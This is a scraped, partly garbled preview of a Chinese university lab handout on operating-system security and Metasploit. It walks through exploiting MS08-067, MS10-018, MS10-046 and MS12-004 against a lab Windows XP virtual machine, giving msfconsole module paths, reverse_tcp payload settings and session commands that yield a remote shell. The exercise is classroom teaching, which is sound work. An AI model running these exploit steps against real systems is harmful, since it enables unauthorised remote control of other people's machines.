計算機系統(tǒng)安全-試驗二-metasploit_第1頁
計算機系統(tǒng)安全-試驗二-metasploit_第2頁
計算機系統(tǒng)安全-試驗二-metasploit_第3頁
計算機系統(tǒng)安全-試驗二-metasploit_第4頁
計算機系統(tǒng)安全-試驗二-metasploit_第5頁
已閱讀5頁,還剩20頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、計算機系統(tǒng)安全 實驗二:操作系統(tǒng)安全與 metasploit 滲透測試實驗?zāi)康模?學(xué)習(xí)計算機操作系統(tǒng)安全相關(guān)內(nèi)容。 學(xué)習(xí)操作系統(tǒng)滲透相關(guān)內(nèi)容 學(xué)習(xí) metasploit 滲透工具使用。實驗原理:Windows 操作系統(tǒng)安全結(jié)構(gòu) 網(wǎng)絡(luò)滲透原理實驗環(huán)境:軟件: vmware 8.0 環(huán)境下, 虛擬機, vm-WinXP鏡像 虛擬機, backtrack 4 及 backtrack 5 虛擬機鏡像 等。實驗拓?fù)洌罕粷B透機: 使用虛擬機 XP,建議使用未安裝更新的英文XP 操作系統(tǒng), 設(shè)置其 IP地址為,自動獲得,虛擬機網(wǎng)絡(luò)連接方式 NAT 方式。實驗室計算機 network 系統(tǒng)下中 network

2、_vm 目錄中有 metasploitable_XP ,可使用之。滲透測試機: 使用 Bt4 或 5 作為操作系統(tǒng),準(zhǔn)備工作: 啟動兩臺虛擬機,按上圖方式設(shè)置,請先記錄下兩臺虛擬機的 IP : 被滲透機:操作系統(tǒng): windows xp with sp1IP 地址:192.168.160.136滲透測試機:操作系統(tǒng):bt5IP 地址:192.168.160.134( 注意,若網(wǎng)絡(luò)連接未啟用,請先啟用之,linux 下可使用 ifup eth0)實驗內(nèi)容:第一部分:針對操作系統(tǒng)內(nèi)部服務(wù)端口進(jìn)行滲透了解 ms08-067 漏洞詳情:(請課后上網(wǎng)查詢相關(guān)內(nèi)容)漏洞描述:曾經(jīng)的沖擊波、 震蕩波等大規(guī)模

3、攻擊都是由于 Windows的 RPC服務(wù)漏洞造成的, MS08-067 遠(yuǎn)程溢出漏洞也不例外。 MS08-067 遠(yuǎn)程溢出漏洞的原因是由于 Windows系統(tǒng)中 RPC存在缺 陷造成的, Windows 系統(tǒng)的 Server 服務(wù)在處理特制 RPC請求時存在緩沖區(qū)溢出漏洞,遠(yuǎn)程 攻擊者可以通過發(fā)送惡意的 RPC 請求觸發(fā)這個溢出,如果受影響的系統(tǒng)收到了特制偽造的 RPC請求,可能允許遠(yuǎn)程執(zhí)行代碼,導(dǎo)致完全入侵用戶系統(tǒng),以SYSTEM權(quán)限執(zhí)行任意指令并獲取數(shù)據(jù),并獲取對該系統(tǒng)的控制權(quán),造成系統(tǒng)失竊及系統(tǒng)崩潰等嚴(yán)重問題。漏洞對象:受 MS08-067 遠(yuǎn)程溢出漏洞影響的系統(tǒng)非常多,受影響的操作系

4、統(tǒng)有 Windows XP /2000/Vista/2003 等。除 Windows Server 2008 Core 外,基本上所有的 Windows 系統(tǒng)都會 遭受此漏洞的攻擊,特別是在 Windows 2000 、 Windows XP和 Windows Server 2003 系統(tǒng), 攻擊者可以利用此漏洞無需通過認(rèn)證運行任意代碼。這個漏洞還可能被蠕蟲利用,此安全 漏洞可以通過惡意構(gòu)造的網(wǎng)絡(luò)包直接發(fā)起攻擊,并且攻擊者可以獲取完整權(quán)限,因此該漏 洞很可能會被用于制作蠕蟲以進(jìn)行大規(guī)模的攻擊。漏洞端口:445步驟一:啟動 metasploit 控制臺 msfconsole記錄其步驟二:搜索模塊

5、 ms08-067 號模塊search ms08-067找到模塊,記錄其名稱,級別,描述步驟三:使用這個模塊 use windows/smb/ms08_067_netapi步驟四:查找有用的 payloads show payloads步驟五:使用其中最常用的一個 payload set payload windows/shell/reverse_tcp步驟六: 查看當(dāng)前的這個 payload 以及攻擊所需要的參數(shù)選項show optionsRPORT ,SMBPIPERHOSTEXITFUNC ,LPORTLHOST0發(fā)現(xiàn)模塊所需要選項,有些有默認(rèn)參數(shù) :有些沒有發(fā)現(xiàn) payload 所需要

6、參數(shù),有些有默認(rèn)參數(shù)有些沒有 :滲透的目標(biāo)設(shè)置值步驟七:設(shè)置參數(shù)set RHOST xx.xx.xx.xx被滲透主機的 IP 地址set LHOST xx.xx.xx.xx滲透測試主機的 IP 地址。步驟八:show options 查看當(dāng)前參數(shù)設(shè)置是否齊全。步驟九:show targets 查看當(dāng)前攻擊的目標(biāo)。0 若有,則表示可進(jìn)行自動選擇攻擊。 其他,則為特定選擇特定系統(tǒng)。步驟十:參數(shù)齊全,目標(biāo)選定,滲透載荷準(zhǔn)備就緒,然后實施。exploit 滲透開始。自動創(chuàng)建一 shell ( 命令提示符)使用 ipconfig 及 dir 等命令確定當(dāng)前控制的計算機是哪臺。打開放大鏡:步驟十一:Exi

7、t 然后再 exit 退出。第二部分:針對操作系統(tǒng)下的瀏覽器進(jìn)行滲透步驟一:瀏覽器漏洞 MS10-018了解 ms10-018 漏洞詳情: (請課后上網(wǎng)查詢相關(guān)內(nèi)容) 漏洞描述 :在提交數(shù)據(jù)時 Internet Explorer 處理使用特制編碼字符串的內(nèi)容的方式存在信 息泄露漏洞。攻擊者可以通過創(chuàng)建特制的網(wǎng)頁來利用這個漏洞,如果用戶查看了該網(wǎng)頁就 會導(dǎo)致信息泄露。成功利用這個漏洞的攻擊者可以查看本地計算機或其他域或 Internet Explorer 區(qū)中的其他瀏覽器窗口的內(nèi)容。漏洞對象 :Microsoft Internet Explorer 7.0Microsoft_Internet_E

8、xplorer_6.0_SP1Microsoft Internet Explorer 6.0Microsoft _Internet _Explorer _5.0.1_ SP4漏洞端口 :8080步驟一:啟動 metasploit 控制臺 msfconsole步驟二:搜索模塊 ms10-018 號模塊search ms10-018找到模塊,記錄其名稱,級別,描述步驟三:使用這個模塊use windows/browser/ms10_018_ie_behaviors步驟四:查找有用的 payloads show payloads步驟五:使用其中最常用的一個 payloadset payload wi

9、ndows/shell/reverse_tcp步驟六:查看當(dāng)前的這個 payload 以及攻擊所需要的參數(shù)選項show options發(fā)現(xiàn)模塊所需要選項,有些有默認(rèn)參數(shù) : SRVHOST,SRVPORT,SSL,SSLVersion有些沒有 : URIPATH發(fā)現(xiàn) payload 所需要參數(shù),有些有默認(rèn)參數(shù) : EXITFUNC,LPORT有些沒有 : LHOST步驟七:設(shè)置 SRVHOST和 LHOST 都設(shè)置為滲透測試機 IP set SRVHOST xx.xxx.xx.xxxset LHOST xx.xx.xxx.xxx創(chuàng)建一 shell ( 命令提示符)使用 ipconfig 及 d

10、ir 等命令確定當(dāng)前控制的計算機是哪臺target 可設(shè)置為 0滲透準(zhǔn)備exploit 則列出一 URL如: using url : htpp:/xxx.xxx.xxx.xxx:8080/qte30235fs 暫時滲透到此( 注意其中的 qte30235fs 為自動產(chǎn)生 )在當(dāng)對方機器 使用 htpp:/xxx.xxx.xxx.xxx:8080/qte30235fs時, sessions 產(chǎn)生使用 sessions 來獲知 sessionsessions -i 1直接將 session 轉(zhuǎn)到 shell 中打開寫字板:第三部分:針對操作系統(tǒng)下類似快捷方式使用進(jìn)行滲透步驟一:瀏覽器漏洞 MS10

11、-046 了解 ms10-046 漏洞詳情: (請課后上網(wǎng)查詢相關(guān)內(nèi)容)漏洞描述:Windows支持使用快捷方式或 LNK文件。 LNK文件是指向本地文件的引用,點擊 LNK文 件與點擊快捷方式所指定的目標(biāo)具有相同的效果。Windows 沒有正確地處理 LNK 文件,特制的 LNK文件可能導(dǎo)致 Windows 自動執(zhí)行快捷方 式文件所指定的代碼。這些代碼可能位于USB驅(qū)動、本地 或遠(yuǎn)程文件系統(tǒng)、光驅(qū)或其他位置,使用資源管理器查看了 LNK文件所在位置就足以觸發(fā)這個漏洞。默認(rèn)下Windows 啟動了自動加載和自動播放功能,因此 在連接可移動設(shè)備(如 USB閃存)后 Windows 會自動打開資源

12、管理器。其他顯示文件圖標(biāo)的應(yīng)用也可用作這個漏洞的攻擊載體。 漏洞對象 :Microsoft Windows XP SP3Microsoft Windows XP SP2Microsoft WindowsVista SP2Microsoft WindowsVista SP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Server 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7漏洞端口 :80 步驟一:啟動 me

13、tasploit 控制臺 msfconsole步驟二:搜索模塊 ms10-046 號模塊search ms10-046找到模塊,記錄其名稱,級別,描述 步驟三: 使用這個模塊 use windows/browser/ms10_046_shortcut_icon_dllloader步驟四:查找有用的 payloads show payloads步驟五:使用其中最常用的一個 payload set payload windows/shell/reverse_tcp步驟六:查看當(dāng)前的這個 payload 以及攻擊所需要的參數(shù)選項 show optionsUNCHOSTLHOST步驟七EXITFUNC

14、 ,LPORTSRVPORT ,SRVHOST ,URIPATH發(fā)現(xiàn)模塊所需要選項,有些有默認(rèn)參數(shù)有些沒有發(fā)現(xiàn) payload 所需要參數(shù),有些有默認(rèn)參數(shù)有些沒有 :設(shè)置 SRVHOST和 LHOST 都設(shè)置為滲透測試機 IPset SRVHOST xx.xxx.xx.xxx set LHOST xx.xx.xxx.xxx設(shè)置瀏覽的 URLset URIPATH hzs.html ( 其中 hzs 為你的姓名的首字母 )target 可設(shè)置為 0滲透準(zhǔn)備exploit報錯,說明 URIPATH不能改動,需要改回默認(rèn)值重新 exploit則列出一 URL如: using url : htpp:/

15、xxx.xxx.xxx.xxx:8080/hzs.html 暫時滲透到此在當(dāng)對方機器 使用如: using url : htpp:/xxx.xxx.xxx.xxx:8080/hzs.html 時, sessions 產(chǎn)生使用 sessions 來獲知 sessionsessions -i 1 直接將 session轉(zhuǎn)到 shell 中創(chuàng)建一 shell ( 命令提示符) 使用 ipconfig 及 dir 等命令確定當(dāng)前控制的計算機是哪臺打開任務(wù)管理器: 使用 taskmgr 命令S Windows Task ManagerFile Options View Shut Down HelpApp

16、lications Processes Performance Networking UsersImage NameUser NameCPUMem Usagevmtoolsd.exeSYSTEM007,044 K Itaskmgr.exeAdministrator00920 Kmsmsgs.exeAdministrator002,728 KVMwareUser.exeAdministrator008,052 KVMwareTray.exeAdministrator004,124 Kexplorer.exeAdministrator0011,916kcmd.exeAdministrator001

17、,076 Krundll32.exeAdministrator001,200 Kspoolcv exeSYSTEM003,088 Ksvchost.exeLOCAL SERVICE0020Ksvchost.exeNETWORK SERVICE001,676 Ksvchost.exeSYSTEM0014,268 Ksvchost.exeSYSTEM00乙592 Kvmacthlp.exeSYSTEM002,080 Klsass.exeSYSTEM00884 Kservices.exeSYSTEM002,768 Kwinlogon.exeSYSTEM003,436 Kcsrss.exeSYSTEM

18、003,224 KvrrKdaSYSTFMnn344 K Show processes from all usersProcesses: 23 CPU Usage: 0%叵區(qū)IaEnd ProcessCommit Charge: 93M / 1250M* 第四部分:滲透時使用 meterpreter 工具。瀏覽器漏洞 MS12-004Windows Media Player 是 系 統(tǒng) 的 多 媒 體 播 放 組 件 。WMP在處理畸形結(jié)構(gòu)的 MIDI 數(shù)據(jù)時存在內(nèi)存破壞漏洞, 遠(yuǎn)程攻擊者可能利用此漏洞通過誘使用戶訪問惡意 網(wǎng)頁控制用戶系統(tǒng)。受影響系統(tǒng):Microsoft Windows XP

19、 ProfessionalMicrosoft Windows XP Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows Server 2008Microsoft Windows Server 2003 Web EditionMicrosoft Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7啟動 msfconsole search ms12_004搜索不到該模塊得到相關(guān)結(jié)果為 windows/browser/ms12_004_midi 使用它 use windows/browser/ms12_004_midi查看 payloadsshow payloadsset payload windows/mete

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論